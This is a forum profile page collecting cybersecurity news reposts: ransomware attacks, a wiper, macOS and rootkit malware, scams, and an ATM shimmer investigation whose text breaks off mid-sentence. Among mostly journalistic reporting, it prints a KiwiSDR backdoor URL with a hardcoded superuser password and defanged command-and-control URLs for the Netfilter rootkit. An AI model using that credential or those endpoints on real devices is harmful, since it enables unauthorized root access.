Jump to content

Oxygen

Moderators
  • Content Count

    81
  • Joined

  • Last visited

Community Reputation

2 Neutral

1 Follower

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Taiwanese motherboard maker has been hit by the RansomEXX ransomware gang, who threaten to publish 112GB of stolen data unless a ransom is paid Gigabyte is best known for its motherboards but also manufactures other computer components and hardware, such as graphics cards, data center servers, laptops, and monitors. The attack occurred late Tuesday night into Wednesday and forced the company to shut down its systems in Taiwan. The incident also affected multiple websites of the company, including its support site and portions of the Taiwanese website Gigabyte support down due to ransomware attack Customers have also reported issues accessing support documents or receiving updated information about RMAs, which is likely due to the ransomware attack. According to the Chinese news site United Daily News, Gigabyte confirmed they suffered a cyberattack that affected a small number of servers. After detecting the abnormal activity on their network, they had shut down their IT systems and notified law enforcement. If you have first-hand information about this or other unreported cyberattacks, you can confidentially contact us on Signal at +16469613731 or on Wire at @lawrenceabrams-bc. Gigabyte suffers RansomEXX ransomware attack While Gigabyte has not officially stated what ransomware operation performed the attack, BleepingComputer has learned it was conducted by the RansomEXX gang. When the RansomEXX operation encrypts a network, they will create ransom notes on each encrypted device. These ransom notes contain a link to a non-public page meant to only be accessible to the victim to test the decryption of one file and to leave an email address to begin ransom negotiations. Today, a source sent BleepingComputer a link to a non-public RansomEXX leak page for Gigabytes Technologies, where the threat actors claim to have stolen 112GB of data during the attack. In a ransom note also seen by BleepingComputer, the threat actors state, "Hello, Gigabyte (gigabyte.com)!" and include the same link to the private leak page shared with us by our source. Non-public Gigabyte data leak page On this non-public leak page, the threat actors claim to have stolen 112 GB of data from an internal Gigabyte network as well as the American Megatrends Git Repository, We have downloaded 112 GB (120,971,743,713 bytes) of your files and we are ready to PUBLISH it. Many of them are under NDA (Intel, AMD, American Megatrends). Leak sources: newautobom.gigabyte.intra, git.ami.com.tw and some others. On the private data leak page, the threat actors also shared screenshots of four documents under NDA stolen during the attack. While we will not be posting the leaked images, the confidential documents include an American Megatrends debug document, an Intel "Potential Issues" document, an "Ice Lake D SKU stack update schedule," and a AMD revision guide. BleepingComputer has attempted to contact Gigabyte about the attack but has not heard back at this time. What you need to know about RansomEXX The RansomEXX ransomware operation originally started under the name Defray in 2018 but rebranded as RansomEXX in June 2020 when they become more active. Like other ransomware operations, RansomEXX will breach a network through Remote Desktop Protocol, exploits, or stolen credentials. Once they gain access to the network, they will harvest more credentials as they slowly gain control of the Windows domain controller. During this lateral spread through the network, the ransomware gang will steal data from unencrypted devices used as leverage in ransom extortions. RansomEXX does not only target Windows devices but has also created a Linux encryptor to encrypt virtual machines running VMware ESXi servers. Over the past month, the RansomEXX gang has become more active as they have recently attacked Italy's Lazio region and Ecuador's state-run Corporación Nacional de Telecomunicación (CNT). Other high-profile attacks by the ransomware gang include Brazil's government networks, the Texas Department of Transportation (TxDOT), Konica Minolta, IPG Photonics, and Tyler Technologies. __________________
  2. The FBI Criminal Investigative Division and Securities and Exchange Commission warn investors of fraudsters impersonating registered investment professionals such as investment advisers and registered brokers. The end goal of these broker imposter schemes is to lure their targets into investment scams using spoofed sites, fake social media profiles, cold calling, and doctored documents. This warning was issued in collaboration with SEC's Office of Investor Education and Advocacy (OIEA), an SEC department designed to help individual investors protect themselves from securities fraud or abuse. "Fraudsters may falsely claim to be registered with the Securities and Exchange Commission (SEC), the Financial Industry Regulatory Authority (FINRA) or a state securities regulator in order to lure investors into scams, or even impersonate real investment professionals who actually are registered with these organizations," the FBI and SEC warned earlier this week. "Fraudsters may misappropriate the name, address, registration number, logo, photo, or website likeness of a currently or previously registered firm or investment professional." FBI and SEC's warning follows a similar fraud alert issued by FINRA this week regarding broker imposter scams using phishing sites impersonating brokers and doctored SEC or FINRA registration documents. Scam signs on falsified BrokerCheck report (FINRA) Investors are advised first to check if those reaching out with investment opportunities are licensed or registered with the Investor.gov search tool and confirm they're not a scammer by reaching out to the seller using independently verified contact information from the firm's Client Relationship Summary (Form CRS). Regardless of whether someone is registered with the SEC or they are only attempting to impersonate a registered investment professional, investors should always check for the following warning signs of an investment scam: Guaranteed high investment returns: Promises of high investment returns – often accompanied by a guarantee of little or no risk – is a classic sign of fraud. Every investment has risk, and the potential for high returns usually comes with high risk. Unsolicited offers: Unsolicited offers (you didn't ask for it and don't know the sender) to earn investment returns that seem "too good to be true" may be part of a scam. Red flags in payment methods for investments: credit cards, digital asset wallets and "cryptocurrencies," wire transfers and checks. Investors are also urged to check the list of Impersonators of Genuine Firms maintained by the SEC, which—although not exhaustive as it doesn't include all unregistered entities, impersonators of genuine firms, fake regulators, or SEC-investigated entities—will likely help avoid some investment scam attempts. If you are the victim or have information on a broker imposter scheme, you can report possible securities fraud to the SEC and online fraud to the FBI's Internet Crime Complaint Center. "If you are suspicious about information you receive from an individual or firm soliciting your business, contact FINRA or another regulator BEFORE you send any personal or financial information," FINRA added. __________________
  3. A new file wiping malware called Meteor was discovered used in the recent attacks against Iran's railway system. Earlier this month, Iran's transport ministry and national train system suffered a cyberattack, causing the agency's websites to shut down and disrupting train service. The threat actors also displayed messages on the railway's message boards stating that trains were delayed or canceled due to a cyberattack. Some of these messages told passengers to call a phone number for more information, which is for the office of Supreme Leader Ali Khamenei. Hackers posting messages to the railway's message boards In addition to trolling the railway, the threat actors locked Windows devices on the network with a lock screen that prevented access to the device. New Meteor wiper used in Iran attacks In a new report by SentinelOne, security researcher Juan Andres Guerrero-Saade revealed that the cyberattack on Iran utilized a previously unseen file wiper called Meteor. A wiper is malware that intentionally deletes files on a computer and causes it to become unbootable. Unlike ransomware attacks, destructive wiper attacks are not used to generate revenue for the attackers. Instead, their goal is to cause chaos for an organization or to distract admins while another attack is taking place. While Iranian cybersecurity firm Aman Pardaz previously analyzed the wiper, SentinelOne could find additional missing components to provide a clearer picture of the attack. "Despite a lack of specific indicators of compromise, we were able to recover most of the attack components described in the post along with additional components they had missed," explains Guerrero-Saade in SentinelOne's research. "Behind this outlandish tale of stopped trains and glib trolls, we found the fingerprints of an unfamiliar attacker." The attack itself is dubbed 'MeteorExpress,' and utilizes a toolkit of batch files and executables to wipe a system, lock the device's Master Boot Record (MBR), and install a screen locker. MeteorExpress attack chain To start the attack, threat actors extracted a RAR archive protected with the 'hackemall' password. The attackers then added these files to a network share accessible to the rest of the computers on the Iranian railway's network. The threat actor then configured Windows group policies to launch a setup.bat batch file that would then copy various executables and batch files to the local device and execute them. Setup.bat batch file As part of this process, the batch files would go through the following steps: Check if Kaspersky antivirus was installed and terminate the attack if found. Disconnect the device from the network. Add Windows Defender exclusions to prevent the malware from being detected. Extract various malware executables and batch files to the system. Clear Windows event logs. Delete a scheduled task called ‘AnalyzeAll’ under the Windows Power Efficiency Diagnostics directory. Use Sysinternals 'Sync' tool to flush the filesystem cache to the disk. Launche the Meteor wiper (env.exe or msapp.exe), MBR locker (nti.exe), and screen locker (mssetup.exe) on the computer. When completed, the device will be unbootable, its file deleted, and a screen locker installed that displays the following wallpaper background before the computer is rebooted for the first time. MeteorExpress screen locker While SentinelOne was unable to find the 'nti.exe' MBR locker, the researchers from Aman Pardaz claim that it shares overlap with the notorious NotPetya wiper. "One interesting claim in the Padvish blog is that the manner in which nti.exe corrupts the MBR is by overwriting the same sectors as the infamous NotPetya," explained Guerrero-Saade. "While one’s first instinct might be to assume that the NotPetya operators were involved or that this is an attempt at a false flag operation, it’s important to remember that NotPetya’s MBR corrupting scheme was mostly cribbed from the original Petya used for criminal operations." Initially thought to be a ransomware attack, NotPetya was a wiper that wreaked havoc across the globe in 2017 by spreading to exposed networks via NSA's ETERNALBLUE exploit and encrypting devices. In 2020, the USA indicted six Russian GRU intelligence operatives believed to be part of the elite Russian hacking group known as "Sandworm" for the NotPetya attack. At this time, the motive for the Meteor wiper attacks on Iran's railway is not clear, and the attacks have not been attributed to any particular group or country. "We cannot yet make out the shape of this adversary across the fog. Perhaps it’s an unscrupulous mercenary group. Or the latent effects of external training coming to bear on a region’s nascent operators," concludes SentinelOne's report. "At this time, any form of attribution is pure speculation and threatens to oversimplify a raging conflict between multiple countries with vested interests, means, and motive." __________________
  4. Security researchers have published details about the method used by a strain of macOS malware to steal login information from multiple apps, enabling its operators to steal accounts. Dubbed XCSSET, the malware keeps evolving and has been targeting macOS developers for more than a year by infecting local Xcode projects. Stealing Telegram accounts, Chrome passwords XCSSET collects from infected computers files with sensitive information belonging to certain applications and sends them to the command and control (C2) server. One of the targeted apps is Telegram instant messaging software. The malware creates the archive “telegram.applescript” for the “keepcoder.Telegram” folder under the Group Containers directory. Collecting the Telegram folder allows the hackers to log into the messaging app as the legitimate owner of the account. Researchers at Trend Micro explain that copying the stolen folder on another machine with Telegram installed gives the attackers access to the victim’s account. XCSSET can steal sensitive data this way because normal users can access the Application sandbox directory with read and write permissions. “Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory” - Trend Micro The researchers also analyzed the method used to steal the passwords saved in Google Chrome, a technique that requires user interaction and has been described since at least 2016. The threat actor needs to get the Safe Storage Key, which is stored in the user’s keychain as “Chrome Safe Storage.” However, they use a fake dialog to trick the user into giving administrator privileges to all of the attacker’s operations necessary to get the Safe Storage Key that can decrypt passwords stored in Chrome. Once decrypted, all the data is sent to the attacker’s command and control server. Similar scripts exist in XCSSET for stealing sensitive data from other apps: Contacts, Evernote, Notes, Opera, Skype, WeChat. Trend Micro researchers say that the latest version of XCSSET they analyzed also has an updated list of C2 servers and a new “canary” module for cross-site scripting (XSS) injections in the experimental Chrome Canary web browser. While the recent updates of the malware are far from adding significant features, they show that XCSSET is evolving and adapting continuously. XCSSET is targeting the latest macOS version (currently Big Sur) and has been seen in the past leverage a zero-day vulnerability to circumvent protections for full disk access and avoid explicit content from the user. __________________
  5. Attackers have stolen 1 TB of proprietary data belonging to Saudi Aramco and are offering it for sale on the darknet. The Saudi Arabian Oil Company, better known as Saudi Aramco, is one of the largest public petroleum and natural gas companies in the world. The oil giant employs over 66,000 employees and brings in almost $230 billion in annual revenue. The threat actors are offering Saudi Aramco's data starting at a negotiable price of $5 million. Saudi Aramco has pinned this data incident on third-party contractors and tells BleepingComputer that the incident had no impact on Aramco's operations. "Zero-day exploitation" used to breach network This month, a threat actor group known as ZeroX is offering 1 TB of proprietary data belonging to Saudi Aramco for sale. ZeroX claims the data was stolen by hacking Aramco's "network and its servers," sometime in 2020. As such, the files in the dump are as recent as 2020, with some dating back to 1993, according to the group. When asked by BleepingComputer as to what method was used to gain access to the systems, the group did not explicitly spell out the vulnerability but instead called it "zero-day exploitation." To create traction among prospective buyers, a small sample set of Aramco's blueprints and proprietary documents with redacted PII were first posted on a data breach marketplace forum in June this year: Forum post with a link to the dark web leak site (BleepingComputer) However, at the time of initial posting, the .onion leak site had a countdown timer set to 662 hours, or about 28 days, after which the sale and negotiations would begin. ZeroX told BleepingComputer that the choice of "662 hours," was intentional and a "puzzle" for Saudi Aramco to solve, but the exact reason behind the choice remains unclear: Threat actors announced data would be up for sale after 662 hours (BleepingComputer) The group says that the 1 TB dump includes documents pertaining to Saudi Aramco's refineries located in multiple Saudi Arabian cities, including Yanbu, Jazan, Jeddah, Ras Tanura, Riyadh, and Dhahran. And, that some of this data includes: Full information on 14,254 employees: name, photo, passport copy, email, phone number, residence permit (Iqama card) number, job title, ID numbers, family information, etc. Project specification for systems related to/including electrical/power, architectural, engineering, civil, construction management, environmental, machinery, vessels, telecom, etc. Internal analysis reports, agreements, letters, pricing sheets, etc. Network layout mapping out the IP addresses, Scada points, Wi-Fi access points, IP cameras, and IoT devices. Location map and precise coordinates. List of Aramco's clients, along with invoices and contracts. Samples of stolen Saudi Aramco data and blueprints shared on leak site (BleepingComputer) Samples released by ZeroX on the leak site have personally identifiable information (PII) redacted, and a 1 GB sample alone costs US$2,000, paid as Monero (XMR). The threat actor, however, did share a few recent unredacted documents with BleepingComputer for confirmation. The price of the entire 1 TB dump is set at US$5 million, although the threat actors say, the amount is negotiable. A party requesting for an exclusive, one-off sale (i.e. obtain the complete 1 TB dump and demand it be wiped completely from ZeroX's end) is expected to pay a whopping US$50 million. ZeroX shared with BleepingComputer that up until this point, they have been negotiating the sale with five buyers. Not a ransomware or extortion incident Contrary to some claims floating around on the internet [1, 2] labeling this incident a "ransomware attack," it is not. Both the threat actor and Saudi Aramco have confirmed to BleepingComputer that this is not a ransomware incident. Saudi Aramco told BleepingComputer that the data breach occurred at third-party contractors, rather than direct exploitation of Aramco's systems: "Aramco recently became aware of the indirect release of a limited amount of company data which was held by third party contractors." "We confirm that the release of data has no impact on our operations, and the company continues to maintain a robust cybersecurity posture," an Aramco spokesperson told BleepingComputer. Mysteriously enough, the threat actors did not even inform Saudi Aramco of the stolen data, or attempt extortion after gaining access to their networks, which further casts doubts on the purpose of the timer shown above. It seems the countdown timer was merely set up as a lure for prospective buyers; to generate an initial buzz around the sale. In 2012, a prominent data breach against Saudi Aramco's systems wiped over 30,000 computer hard drives clean. The cyberwarfare incident conducted via the Shamoon virus was allegedly linked to Iran. In more recent times, attacks on mission-critical infrastructure like the Colonial Pipeline and the largest U.S. propane provider, AmeriGas, have prompted a need for stepping up cybersecurity efforts at these facilities. __________________
  6. Moldova's "Court of Accounts" has suffered a cyberattack leading to the agency's public databases and audits being destroyed. Court of Accounts of Moldova is a government authority that performs audits of public financial resources and government agencies to comply with international standards. Yesterday, Moldovia's state news agency Moldpres reported on behalf of the Court of Accounts that their website was hacked, and threat actors destroyed audit reports and other public data. “It is for the first time when the supreme audit institution faces such a situation. The destruction of the public page took place in the context of important audits and with impact in the society, at the stage of reporting and making public of the most significant audit missions planned in the institution’s work,’’ the Court of Accounts said. The attack has led the agency to shut down its website while the incident is investigated and data can be restored. Website for Court of Accounts The agency states that they are investigating whether the attack was arbitrary, done for extortion, or to disrupt their work. "The needed investigations will identify whether the attack has been organized by hackers arbitrarily, on purposes of blackmailing, or it is about a planned order, in order to create impediments to the work of the country’s supreme audit institution," said the Court of Accounts. While this cyberattack was destructive for the Court of Accounts, the threat actors could have caused further damage by using the site to distribute malware to visitors. Last week, researchers from T&T Security disclosed that the Kazakhstan government's 'Open Budgets' website used by government agencies and local government branches to publish budget reports was hacked to distribute malicious office documents that installed malware. __________________
  7. The author of a popular software-defined radio (SDR) project has removed a "backdoor" from radio devices that granted root-level access. The backdoor had been, according to the author, present in all versions of KiwiSDR devices for the purposes of remote administration and debugging. Last night, the author pushed out a "bug fix" on the project's GitHub aimed at removing this backdoor silently, which sparked some backlash. Since then, the author's original forum posts and comments with any mention of "backdoor" have been removed over the last few hours. Hardcoded password gives root access to all devices KiwiSDR is a software-defined radio that can be attached to an embedded computer, like Seeed BeagleBone Green (BBG). It is provided either as a standalone board or a more complete version featuring BBG, a GPS antenna, and an enclosure. KiwiSDR user interface with different RF controls SDRs are aimed at replacing radio frequency (RF) communication hardware with software or firmware for carrying out signal processing activities that would normally require hardware devices. The concept is analogous to software-defined networking. Yesterday, Mark Jessop, an RF engineer, and radio operator came across an interesting forum post in which the author of the KiwiSDR project admitted to having remote access to all radio receiver devices running the software. Another user, M. dug out a 2017 forum thread where KiwiSDR's developer admitted that a backdoor indeed provided them with remote access to all KiwiSDR devices. Although the entire KiwiSDR forum site has become inaccessible as of today, an archived copy of the forum post seen by BleepingComputer confirms the contents of the tweet: KiwiSDR software author stated there's a backdoor in all devices giving them remote access Furthermore, as of today, over 600 KiwiSDR devices are online with the backdoor still present in them, as highlighted by Hacker Fantastic. Although these devices are mainly acting as radio receivers, it is worth noting, any remote actor who logs in using the hardcoded master password is granted root-level access to the device's (Linux-based) console. This can enable adversaries to probe into the IoT devices, take them over, and begin traversing adjacent networks the radio devices are connected to: "These KiwiSDRs are used for receiving HF radio stations. The backdoor itself doesn't give an attacker any special SDR access, just that they can access the console of the device (Linux) and start pivoting into networks," ethical hacker xssfox told BleepingComputer. An image of the KiwiSDR administration panel obtained by BleepingComputer shows console level access with root access (notice the #) is possible: KiwiSDR remote admin panel provides root access to the device console A video created by xssfox demonstrates how the backdoor can be exploited via a simple HTTP GET request, which looks like: Code: http://radio-device-domain.example.com:8074/admin?su=kconbyp Note: the superuser password (kconbyp) shown above is an older password, SHA256 hash of which used to be present on KiwiSDR devices. The more recent hash (shown below) is different, indicating "kconbyp" won't work on later versions of KiwiSDR and that a newer master password has been present. Dev pushes out "bug fix" overnight removing the backdoor As seen by BleepingComputer, as of a few hours ago a fix has been committed to KiwiSDR's GitHub project removing the backdoor code. The update removes multiple administrative functions, and specifically the code that compares the provided master password against its SHA256 hash: KiwiSDR author removes hardcoded password from devices (GitHub) Jessop clarified that there is no indication of KiwiSDR's author having misused the backdoor access, which had been introduced with the intention of debugging KiwiSDR devices in good faith. He further said KiwiSDR developer has been extremely responsive in patching bugs and adding features. But, like others, the engineer did express concerns, that the master password would transmit over HTTP enabling any Man-in-the-Middle (MitM) threat actor to potentially intercept it and consequently gain remote access to all devices. Some Redditors also expressed that backdoors were never okay, regardless of whether HTTPS was in use: "No way. Back doors are never okay. Password was sent in the clear, as HTTPS isn't supported. Eventually someone would have exploited this. Hell, someone might have already exploited this and we just don't know about it," said one of the users in a thread. KiwiSDR users should upgrade to the latest version v1.461 released today on GitHub that removes the backdoor from their radio devices. __________________
  8. Kaseya has warned customers that an ongoing phishing campaign attempts to breach their networks by spamming emails bundling malicious attachments and embedded links posing as legitimate VSA security updates. "Spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments," the company said in an alert issued on Thursday evening. "Do not click on any links or download any attachments claiming to be a Kaseya advisory. Moving forward, Kaseya email updates will not contain any links or attachments." Attackers try to backdoor recipients' systems While the company did not provide additional details regarding these attacks, the warning perfectly lines up with another series of malspam emails targeting Kaseya customers with Cobalt Strike payloads. As BleepingComputer first reported, Malwarebytes Threat Intelligence researchers have recently discovered a series of phishing attacks trying to take advantage of the ongoing Kaseya ransomware crisis. "A malspam campaign is taking advantage of Kaseya VSA ransomware attack to drop CobaltStrike," Malwarebytes researchers said. "It contains an attachment named 'SecurityUpdates.exe' as well as a link pretending to be security update from Microsoft to patch Kaseya vulnerability!" Kaseya phishing email sample (Malwarebytes) The attackers' end goal is to deploy Cobal Strike beacons on the recipients' devices to backdoor them and steal sensitive info or deliver more malware payloads. Once the targets run the malicious attachment or download and execute the fake Microsoft update on their devices, the attackers gain persistent remote access to the now compromised systems. In June, following the Colonial Pipeline attack, threat actors also used fake systems updates claiming to help block ransomware infections. These two campaigns highlight that cybercriminals behind phishing attacks keep up with the latest news to push lures relevant to recent events to boost their campaigns' success rates. Given that Kaseya has so far failed to deploy a fix for the VSA zero-day exploited by REvil, some of its customers might fall for this campaign's tricks in their effort to protect their networks from attacks. Light at the end of the tunnel The highly-publicized REvil ransomware attack that hit Kaseya and approximately 1,500 of their direct customers and downstream businesses makes for a perfect lure theme. After the attack was disclosed, CISA and the FBI have shared guidance on how to deal with the attack's aftermath, and the White House National Security Council is urging victims to follow the guidance issued by Kaseya and report incidents to the FBI. However, despite the attack's massive reach, which has led to some calling the largest ransomware attack ever, multiple victims told BleepingComputer that their backups were not affected, and they are restoring systems rather than paying a ransom. Victims who do ultimately pay REvil's ransoms will likely only do so because their backups failed or they had no backups, to begin with. __________________
  9. The REvil ransomware gang is increasing the ransom demands for victims encrypted during Friday's Kaseya ransomware attack. When conducting an attack against a business, ransomware gangs, such as REvil, typically research a victim by analyzing stolen and public data for financial information, cybersecurity insurance policies, and other information. Using this information, the number of encrypted devices, and the amount of stolen data, the threat actors will come up with a high-ball ransom demand that they believe, after negotiations, the victim can afford to pay. However, with Friday's attack on Kaseya VSA servers, REvil targeted the managed service providers and not their customers. Due to this, the threat actors could not determine how much of a ransom they should demand from the encrypted MSP customers. As a solution, it seems the ransomware gang created a base ransom demand of $5 million for MSPs and a much smaller ransom of $44,999 for the MSP's customers who were encrypted. Ransom demand for Kaseya ransomware victims It turns out this $44 thousand number is irrelevant as in numerous negotiation chats shared with and seen by BleepingComputer, the ransomware gang is not honoring these initial ransom demands. When encrypting a victim's network, REvil can use multiple encrypted file extensions during the attack. The threat actors typically provide a decryptor that can decrypt all extensions on the network after a ransom is paid. For victims of the Kaseya ransomware incident, REvil is doing things differently and demanding between $40,000 and $45,000 per individual encrypted file extension found on a victim's network. A portion of REvil ransom negotiation For one victim who stated they had over a dozen encrypted file extensions, the ransomware gang demanded a $500,000 ransom to decrypt the entire network. $500,000 ransom to decrypt the entire network However, the good news is that the REvil representatives have told victims that they only encrypted networks, and nothing more. This means that REvil likely did not steal any of the victims' data, as they are known to use that as leverage in ransomware negotiations immediately. REvil indicates data was not stolen This also indicates that the ransomware operation did not access the victim's networks before the attack. Instead, they likely remotely exploited the Kaseya VSA vulnerability to distribute the encryptor and execute it on the victim's devices. Attack's aftermath Since the attacks on Friday, Kaseya has been working on releasing a patch for the zero-day vulnerability exploited in the REvil attack. This zero-day was discovered by DIVD researchers who disclosed the t to Kaseya and helping test the patch. Unfortunately, REvil found the vulnerability simultaneously and launched their attack on Friday before the patch was ready, just in time for the US Fourth of July holiday weekend. It is believed that over 1,000 businesses have been affected by the attack, including attacks on the Swedish Coop supermarket chain, which had to close approximately 500 stores, a Swedish pharmacy chain, and the SJ transit system. President Biden has directed US intelligence agencies to investigate the attack but has not gone as far to state that the attacks originated from Russia. The FBI also announced today that they are investigating the incident and working closely with CISA and other agencies. "The FBI is investigating the Kaseya ransomware incident and working closely with CISA and other interagency partners to understand the scope of the threat." "If you believe your systems have been compromised, we encourage you to employ all recommended mitigations, follow Kaseya's guidance to shut down your VSA servers immediately and report to the FBI at ic3.gov," said the FBI in a press statement. __________________
  10. Dutch cybersecurity firm Tesorion has released a free decryptor for the Lorenz ransomware, allowing victims to recover some of their files for free without paying a ransom. Lorenz is a human-operated ransomware that began operating in April 2021 and has since listed twelve victims whose data they have stolen and leaked on their ransomware data leak site. Lorenz ransomware data leak site Lorenz is not particularly active and has begun to taper off in recent months compared to other operations. Lorenz ransomware decryptor released The Lorenz ransomware decryption tool can be downloaded from NoMoreRansom and will allow victims to recover some of their encrypted files. Unlike other ransomware decryptors that include the actual decryption key, Tesorion's decryptor operates differently and can only decrypt certain file types. Tesorion researcher Gijs Rijnders told BleepingComputer that only files with well-known file structures could be decrypted, such as Office documents, PDF files, some image types, and movie files. While the decryptor will decrypt not every file type, it will still allow those who do not pay the ransom to recover important files. As you can see below, the decryptor can decrypt well-known file types, such as XLS and XLSX files, without a problem. However, it will not decrypt unknown file types or those with uncommon file structures. Lorenz ransomware decryptor In addition to providing a decryptor, Tesorion provided insight into the encryption technique used by the Lorenz ransomware. In a blog post, Rijnders explains that a bug in how they implement their encryption can cause data to become lost, which would prevent a file from being decrypted even if a ransom was paid. "The result of this bug is that for every file which’s size is a multiple of 48 bytes, the last 48 bytes are lost. Even if you managed to obtain a decryptor from the malware authors, these bytes cannot be recovered," explains Rijnders. __________________
  11. Microsoft has now confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control (C2) IPs. G Data malware analyst Karsten Hahn first took notice of this event last week and was joined by the wider infosec. community in tracing and analyzing the malicious drivers bearing the seal of Microsoft. It turns out, the C2 infrastructure belongs to a company classified under "Communist Chinese military" by the US Department of Defense. This incident has once again exposed threats to software supply-chain security, except this time it stemmed from a weakness in Microsoft's code-signing process. "Netfilter" driver is rootkit signed by Microsoft Last week, G Data's cybersecurity alert systems flagged what appeared to be a false positive, but was not—a Microsoft signed driver called "Netfilter." The driver in question was seen communicating with China-based C&C IPs providing no legitimate functionality and as such raised suspicions. This is when G Data's malware analyst Karsten Hahn shared this publicly and simultaneously contacted Microsoft: The malicious binary has been signed by Microsoft (VirusTotal) "Since Windows Vista, any code that runs in kernel mode is required to be tested and signed before public release to ensure stability for the operating system." "Drivers without a Microsoft certificate cannot be installed by default," states Hahn. At the time, BleepingComputer began observing the behavior of C2 URLs and also contacted Microsoft for a statement. The first C2 URL returns a set of more routes (URLs) separated by the pipe ("|") symbol: Navigating to the C2 URL presents more routes for different purposes Each of these serves a purpose, according to Hahn: The URL ending in "/p" is associated with proxy settings, "/s" provides encoded redirection IPs, "/h?" is for receiving CPU-ID, "/c" provided a root certificate, and "/v?" is related to the malware's self-update functionality. As seen by BleepingComputer, for example, the "/v?" path provided URL to the malicious Netfilter driver in question itself (living at "/d3"): Path to malicious Netfilter driver The G Data researcher spent some time sufficiently analyzing the driver and concluded it to be malware. The researcher has analyzed the driver, its self-update functionality, and Indicators of Compromise (IOCs) in a detailed blog post. "The sample has a self-update routine that sends its own MD5 hash to the server via hxxp://110.42.4.180:2081/v?v=6&m=," says Hahn. An example request would look like this: Code: hxxp://110.42.4.180:2081/v?v=6&m=921fa8a5442e9bf3fe727e770cded4ab "The server then responds with the URL for the latest sample, e.g. hxxp://110.42.4.180:2081/d6 or with 'OK' if the sample is up-to-date. The malware replaces its own file accordingly," further explained the researcher. Malware's self-update functionality analyzed by G Data During the course of his analysis, Hahn was joined by other malware researchers including Johann Aydinbas, Takahiro Haruyama, and Florian Roth. Roth was able to gather the list of samples in a spreadsheet and has provided YARA rules for detecting these in your network environments. Notably, the C2 IP 110.42.4.180 that the malicious Netfilter driver connects to belonged to Ningbo Zhuo Zhi Innovation Network Technology Co., Ltd, according to WHOIS records. The U.S. Department of Defense (DoD) has previously marked this organization as a "Communist Chinese military company," another researcher @cowonaut observed. Microsoft admits to signing the malicious driver Microsoft is actively investigating this incident, although thus far, there is no evidence that stolen code-signing certificates were used. The mishap seems to have resulted from the threat actor following Microsoft's process to submit the malicious Netfilter drivers, and managing to acquire the Microsoft-signed binary in a legitimate manner: "Microsoft is investigating a malicious actor distributing malicious drivers within gaming environments." "The actor submitted drivers for certification through the Windows Hardware Compatibility Program. The drivers were built by a third party." "We have suspended the account and reviewed their submissions for additional signs of malware," said Microsoft yesterday. According to Microsoft, the threat actor has mainly targeted the gaming sector specifically in China with these malicious drivers, and there is no indication of enterprise environments having been affected so far. Microsoft has refrained from attributing this incident to nation-state actors just yet. Falsely signed binaries can be abused by sophisticated threat actors to facilitate large-scale software supply-chain attacks. The multifaceted Stuxnet attack that targeted Iran's nuclear program marks a well-known incident in which code-signing certificates were stolen from Realtek and JMicron to facilitate the attack. This particular incident, however, has exposed weaknesses in a legitimate code-signing process, exploited by threat actors to acquire Microsoft-signed code without compromising any certificates. __________________
  12. In 2015, police departments worldwide started finding ATMs compromised with advanced new “shimming” devices made to steal data from chip card transactions. Authorities in the United States and abroad had seized many of these shimmers, but for years couldn’t decrypt the data on the devices. This is a story of ingenuity and happenstance, and how one former Secret Service agent helped crack a code that revealed the contours of a global organized crime ring. Jeffrey Dant was a special agent at the U.S. Secret Service for 12 years until 2015. After that, Dant served as the global lead for the fraud fusion center at Citi, one of the largest financial institutions in the United States. Not long after joining Citi, Dant heard from industry colleagues at a bank in Mexico who reported finding one of these shimming devices inside the card acceptance slot of a local ATM. As it happens, KrebsOnSecurity wrote about that particular shimmer back in August 2015. This card ‘shimming’ device is made to read chip-enabled cards and can be inserted directly into the ATM’s card acceptance slot. The shimmers were an innovation that caused concern on multiple levels. For starters, chip-based payment cards were supposed to be far more expensive and difficult for thieves to copy and clone. But these skimmers took advantage of weaknesses in the way many banks at the time implemented the new chip card standard. Also, unlike traditional ATM skimmers that run on hidden cell phone batteries, the ATM shimmers found in Mexico did not require any external power source, and thus could remain in operation collecting card data until the device was removed. When a chip card is inserted, a chip-capable ATM reads the data stored on the smart card by sending an electric current through the chip. Incredibly, these shimmers were able to siphon a small amount of that power (a few milliamps) to record any data transmitted by the card. When the ATM is no longer in use, the skimming device remains dormant, storing the stolen data in an encrypted format. Dant and other investigators looking into the shimmers didn’t know at the time how the thieves who planted the devices went about gathering the stolen data. Traditional ATM skimmers are either retrieved manually, or they are programmed to transmit the stolen data wirelessly, such as via text message or Bluetooth. But recall that these shimmers don’t have anywhere near the power needed to transmit data wirelessly, and the flexible shimmers themselves tend to rip apart when retrieved from the mouth of a compromised ATM. So how were the crooks collecting the loot? “We didn’t know how they were getting the PINs at the time, either,” Dant recalled. “We found out later they were combining the skimmers with old school cameras hidden in fake overhead and side panels on the ATMs.” Investigators wanted to look at the data stored on the shimmer, but it was encrypted. So they sent it to MasterCard’s forensics lab in the United Kingdom, and to the Secret Service. “The Secret Service didn’t have any luck with it,” Dant said. “MasterCard in the U.K. was able to understand a little bit at a high level what it was doing, and they confirmed that it was powered by the chip. But the data dump from the shimmer was just encrypted gibberish.” Organized crime gangs that specialize in deploying skimmers very often will encrypt stolen card data as a way to remove the possibility that any gang members might try to personally siphon and sell the card data in underground markets. THE DOWNLOAD CARDS Then in 2017, Dant got a lucky break: Investigators had found a shimming device inside an ATM in New York City, and that device appeared identical to the shimmers found in Mexico two years earlier. “That was the first one that had showed up in the U.S. at that point,” Dant said. The Citi team suspected that if they could work backwards from the card data that was known to have been recorded by the skimmers, they might be able to crack the encryption. “We knew when the shimmer went into the ATM, thanks to closed-circuit television footage,” Dant said. “And we know when that shimmer was discovered. So between that time period of a couple of days, these are the cards that interacted with the skimmer, and so these card numbers are most likely on this device.” Based off that hunch, MasterCard’s eggheads had success decoding the encrypted gibberish. But they already knew which payment cards had been compromised, so what did investigators stand to gain from breaking the encryption? According to Dant, this is where things got interesting: They found that the same primary account number (unique 16 digits of the card) was present on the download card and on the shimmers from both New York City and Mexican ATMs. Further research revealed that account number was tied to a payment card issued years prior by an Austrian bank to a customer who reported never receiving the card in the mail. “So why is this Austrian bank card number on the download card and two different shimming devices in two different countries, years apart?” Dant said he wondered at the time. He didn’t have to wait long for an answer. Soon enough, the NYPD brought a case against a group of Romanian men suspected of planting the same shimming devices in both the U.S. and Mexico. Search warrants served against the Romanian defendants turned up multiple copies of the shimmer they’d seized 